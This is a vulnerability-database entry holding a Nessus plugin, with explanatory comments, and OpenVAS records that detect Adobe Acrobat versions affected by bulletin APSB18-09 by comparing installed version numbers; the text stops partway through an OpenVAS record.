ID ADOBE_ACROBAT_APSB18-09.NASL Type nessus Reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2021-01-02T00:00:00
Description
The version of Adobe Acrobat installed on the remote Windows host is a
version prior to 2015.006.30418, 2017.011.30080,
or 2018.011.20040. It is, therefore, affected by multiple
vulnerabilities.
Note that Nessus has not tested for these issues but has instead
relied only on the application's self-reported version number.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
# Registration branch: runs only when `description` is set. It declares the
# plugin's metadata and ends with exit(0), so the version check further down
# is not reached from here.
if (description)
{
  # Plugin identity and revision stamp.
  script_id(109895);
  script_version("1.9");
  script_cvs_date("Date: 2019/04/08 10:48:58");

  # CVE identifiers attached to this finding (49 entries).
  script_cve_id(
    "CVE-2018-4947", "CVE-2018-4948", "CVE-2018-4949", "CVE-2018-4950",
    "CVE-2018-4951", "CVE-2018-4952", "CVE-2018-4953", "CVE-2018-4954",
    "CVE-2018-4955", "CVE-2018-4956", "CVE-2018-4957", "CVE-2018-4958",
    "CVE-2018-4959", "CVE-2018-4960", "CVE-2018-4961", "CVE-2018-4962",
    "CVE-2018-4963", "CVE-2018-4964", "CVE-2018-4965", "CVE-2018-4966",
    "CVE-2018-4967", "CVE-2018-4968", "CVE-2018-4969", "CVE-2018-4970",
    "CVE-2018-4971", "CVE-2018-4972", "CVE-2018-4973", "CVE-2018-4974",
    "CVE-2018-4975", "CVE-2018-4976", "CVE-2018-4977", "CVE-2018-4978",
    "CVE-2018-4979", "CVE-2018-4980", "CVE-2018-4981", "CVE-2018-4982",
    "CVE-2018-4983", "CVE-2018-4984", "CVE-2018-4985", "CVE-2018-4986",
    "CVE-2018-4987", "CVE-2018-4988", "CVE-2018-4989", "CVE-2018-4990",
    "CVE-2018-4993", "CVE-2018-4995", "CVE-2018-4996",
    "CVE-2018-12812", "CVE-2018-12815"
  );

  # Bugtraq identifiers attached to this finding.
  script_bugtraq_id(
    104102, 104167, 104168, 104169, 104171, 104172,
    104173, 104174, 104175, 104176, 104177
  );

  script_name(english:"Adobe Acrobat < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09)");
  script_summary(english:"Checks the version of Adobe Acrobat.");

  # Report text. These string literals span several lines; their continuation
  # lines stay at column 0 so the stored text gains no extra indentation.
  script_set_attribute(attribute:"synopsis", value:
"The version of Adobe Acrobat installed on the remote Windows host is
affected by multiple vulnerabilities.");
  # The description itself states the limitation of this check: the finding is
  # based on the self-reported version number, not on testing for the issues.
  script_set_attribute(attribute:"description", value:
"The version of Adobe Acrobat installed on the remote Windows host is a
version prior to 2015.006.30418, 2017.011.30080,
or 2018.011.20040. It is, therefore, affected by multiple
vulnerabilities.
Note that Nessus has not tested for these issues but has instead
relied only on the application's self-reported version number.");
  script_set_attribute(attribute:"see_also", value:"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Adobe Acrobat 2015.006.30418 / 2017.011.30080
/ 2018.011.20040 or later.");

  # Severity scoring: CVSS v2 and v3.0 base and temporal vectors, with the
  # score attributed to CVE-2018-4947 via cvss_score_source.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-4947");

  # Triage hints: the plugin records that exploits are available and sets the
  # exploit_framework_core and exploited_by_malware flags, so a finding from
  # this plugin is a candidate for prompt patching.
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");

  # Disclosure, patch and plugin release dates.
  script_set_attribute(attribute:"vuln_publication_date", value:"2018/05/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2018/05/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2018/05/17");

  # Declared as a "local" plugin for the Adobe Acrobat CPE.
  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:adobe:acrobat");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Windows");
  script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # Prerequisites: the detection plugin named here and the two KB keys.
  # NOTE(review): presumably these keys are only populated by a credentialed
  # scan with registry access, so an uncredentialed scan would not run this
  # check at all - confirm against adobe_acrobat_installed.nasl.
  script_dependencies("adobe_acrobat_installed.nasl");
  script_require_keys("SMB/Registry/Enumerated", "installed_sw/Adobe Acrobat");

  exit(0);
}
include("vcf.inc");
include("vcf_extras.inc");
# Check phase: compare the detected Adobe Acrobat version against the
# vulnerable ranges and report. This is a version comparison only; per the
# plugin description, the individual issues are not tested for.

# Requires the "SMB/Registry/Enumerated" KB item before continuing.
get_kb_item_or_exit("SMB/Registry/Enumerated");

# Install record for "Adobe Acrobat", requested as a Windows local install.
app_info = vcf::get_app_info(app:"Adobe Acrobat", win_local:TRUE);

# One row per fixed release named in the plugin title
# (2015.006.30418 / 2017.011.30080 / 2018.011.20040).
# NOTE(review): the third row's range (15.7 - 18.11.20038) numerically contains
# the second row's (17.8 - 17.11.30079); presumably the Continuous-vs-Classic
# detection in the helper below decides which row applies - confirm against
# vcf_extras.inc.
# NOTE(review): the third row's max_version (18.11.20038) is two builds below
# its fixed_version (18.11.20040); presumably no 18.11.20039 build shipped -
# confirm against the vendor bulletin.
constraints = [
  {
    "min_version"   : "15.6",
    "max_version"   : "15.6.30417",
    "fixed_version" : "15.6.30418"
  },
  {
    "min_version"   : "17.8",
    "max_version"   : "17.11.30079",
    "fixed_version" : "17.11.30080"
  },
  {
    "min_version"   : "15.7",
    "max_version"   : "18.11.20038",
    "fixed_version" : "18.11.20040"
  }
];

# The adobe_reader namespace's check_version_and_report is used here so that
# Continuous vs Classic is detected properly, and max_segs:3 limits the version
# to 3 segments (18.x.y rather than 18.x.y.12345).
vcf::adobe_reader::check_version_and_report(
  app_info    : app_info,
  constraints : constraints,
  severity    : SECURITY_HOLE,
  max_segs    : 3
);
{"id": "ADOBE_ACROBAT_APSB18-09.NASL", "bulletinFamily": "scanner", "title": "Adobe Acrobat < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09)", "description": "The version of Adobe Acrobat installed on the remote Windows host is a\nversion prior to 2015.006.30418, 2017.011.30080,\nor 2018.011.20040. It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "published": "2018-05-17T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/109895", "reporter": "This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://helpx.adobe.com/security/products/acrobat/apsb18-09.html"], "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "type": "nessus", "lastseen": "2021-01-01T01:13:19", "edition": 30, "viewCount": 48, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310813239", "OPENVAS:1361412562310813230", 
"OPENVAS:1361412562310813233", "OPENVAS:1361412562310813240", "OPENVAS:1361412562310813238", "OPENVAS:1361412562310813232", "OPENVAS:1361412562310813241", "OPENVAS:1361412562310813231"]}, {"type": "kaspersky", "idList": ["KLA11252"]}, {"type": "nessus", "idList": ["ADOBE_READER_APSB18-09.NASL", "MACOSX_ADOBE_ACROBAT_APSB18-09.NASL", "MACOSX_ADOBE_READER_APSB18-09.NASL"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:52B0618B9393F16E911AB8A5CC487A7C"]}, {"type": "cve", "idList": ["CVE-2018-4968", "CVE-2018-4981", "CVE-2018-4973", "CVE-2018-4958", "CVE-2018-4984", "CVE-2018-4970", "CVE-2018-4976", "CVE-2018-12812", "CVE-2018-4961", "CVE-2018-4972"]}, {"type": "attackerkb", "idList": ["AKB:F655D7DB-2168-466C-BE67-0F0908306BE4"]}, {"type": "seebug", "idList": ["SSV:97293", "SSV:97294"]}, {"type": "talosblog", "idList": ["TALOSBLOG:C087C65FAEEB57D382F9DD6FD51D549C", "TALOSBLOG:E89C3607ED6143C88E65B06729E1F294"]}, {"type": "myhack58", "idList": ["MYHACK58:62201890341"]}, {"type": "talos", "idList": ["TALOS-2018-0517", "TALOS-2018-0592", "TALOS-2018-0569", "TALOS-2018-0518"]}, {"type": "zdi", "idList": ["ZDI-18-438", "ZDI-18-452", "ZDI-18-598", "ZDI-18-465", "ZDI-18-457", "ZDI-18-437", "ZDI-18-460", "ZDI-18-451", "ZDI-18-456", "ZDI-18-454"]}], "modified": "2021-01-01T01:13:19", "rev": 2}, "score": {"value": 8.9, "vector": "NONE", "modified": "2021-01-01T01:13:19", "rev": 2}, "vulnersScore": 8.9}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109895);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/04/08 10:48:58\");\n\n script_cve_id(\n \"CVE-2018-4947\",\n \"CVE-2018-4948\",\n \"CVE-2018-4949\",\n \"CVE-2018-4950\",\n \"CVE-2018-4951\",\n \"CVE-2018-4952\",\n \"CVE-2018-4953\",\n \"CVE-2018-4954\",\n \"CVE-2018-4955\",\n \"CVE-2018-4956\",\n \"CVE-2018-4957\",\n \"CVE-2018-4958\",\n \"CVE-2018-4959\",\n \"CVE-2018-4960\",\n \"CVE-2018-4961\",\n \"CVE-2018-4962\",\n 
\"CVE-2018-4963\",\n \"CVE-2018-4964\",\n \"CVE-2018-4965\",\n \"CVE-2018-4966\",\n \"CVE-2018-4967\",\n \"CVE-2018-4968\",\n \"CVE-2018-4969\",\n \"CVE-2018-4970\",\n \"CVE-2018-4971\",\n \"CVE-2018-4972\",\n \"CVE-2018-4973\",\n \"CVE-2018-4974\",\n \"CVE-2018-4975\",\n \"CVE-2018-4976\",\n \"CVE-2018-4977\",\n \"CVE-2018-4978\",\n \"CVE-2018-4979\",\n \"CVE-2018-4980\",\n \"CVE-2018-4981\",\n \"CVE-2018-4982\",\n \"CVE-2018-4983\",\n \"CVE-2018-4984\",\n \"CVE-2018-4985\",\n \"CVE-2018-4986\",\n \"CVE-2018-4987\",\n \"CVE-2018-4988\",\n \"CVE-2018-4989\",\n \"CVE-2018-4990\",\n \"CVE-2018-4993\",\n \"CVE-2018-4995\",\n \"CVE-2018-4996\",\n \"CVE-2018-12812\",\n \"CVE-2018-12815\"\n );\n script_bugtraq_id(\n 104102,\n 104167,\n 104168,\n 104169,\n 104171,\n 104172,\n 104173,\n 104174,\n 104175,\n 104176,\n 104177\n );\n\n script_name(english:\"Adobe Acrobat < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09)\");\n script_summary(english:\"Checks the version of Adobe Acrobat.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat installed on the remote Windows host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed on the remote Windows host is a\nversion prior to 2015.006.30418, 2017.011.30080,\nor 2018.011.20040. 
It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Acrobat 2015.006.30418 / 2017.011.30080\n/ 2018.011.20040 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4947\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_acrobat_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/Adobe Acrobat\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"Adobe Acrobat\", win_local:TRUE);\nconstraints = [\n { \"min_version\" : \"15.6\", \"max_version\" : \"15.6.30417\", \"fixed_version\" : \"15.6.30418\" },\n { \"min_version\" : \"17.8\", \"max_version\" : \"17.11.30079\", \"fixed_version\" : \"17.11.30080\" },\n { \"min_version\" : \"15.7\", \"max_version\" : \"18.11.20038\", \"fixed_version\" : \"18.11.20040\" }\n];\n# using adobe_reader namespace check_version_and_report to properly detect Continuous vs Classic, \n# and limit ver segments to 3 (18.x.y vs 18.x.y.12345) with max_segs:3\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "naslFamily": "Windows", "pluginID": "109895", "cpe": ["cpe:/a:adobe:acrobat"], "scheme": null, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}
{"openvas": [{"lastseen": "2019-07-17T14:17:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Acrobat 2017\n and is prone to multiple vulnerabilities.", "modified": "2019-07-16T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813230", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813230", "type": "openvas", "title": "Adobe Acrobat 2017 Security Updates(apsb18-09)-Windows", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Acrobat 2017 Security Updates(apsb18-09)-Windows\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or 
FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813230\");\n script_version(\"2019-07-16T10:51:36+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-16 10:51:36 +0000 (Tue, 16 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:36 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Acrobat 2017 Security Updates(apsb18-09)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat 2017\n and 
is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat 2017 before 2017.011.30080 on\n MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat 2017 version\n 2017.011.30080 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"17.0\", test_version2:\"17.011.30079\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"17.011.30080 (2017.011.30080)\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2019-07-17T14:18:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Acrobat DC\n (Classic Track) and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813239", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813239", "type": "openvas", "title": "Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09) - Mac OS X", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09)-MAC OS X\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty 
of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_dc_classic\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813239\");\n script_version(\"2019-07-05T08:21:18+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:21:18 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:55 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09) - Mac OS X\");\n\n script_tag(name:\"summary\", 
value:\"This host is installed with Adobe Acrobat DC\n (Classic Track) and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat DC (Classic Track)\n 2015.006.30418 and earlier versions on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat DC (Classic Track)\n version 2015.006.30418 or later. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_acrobat_dc_classic_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/AcrobatDC/Classic/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"15.006.30418\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"15.006.30418 (2015.006.30418)\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:18:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", 
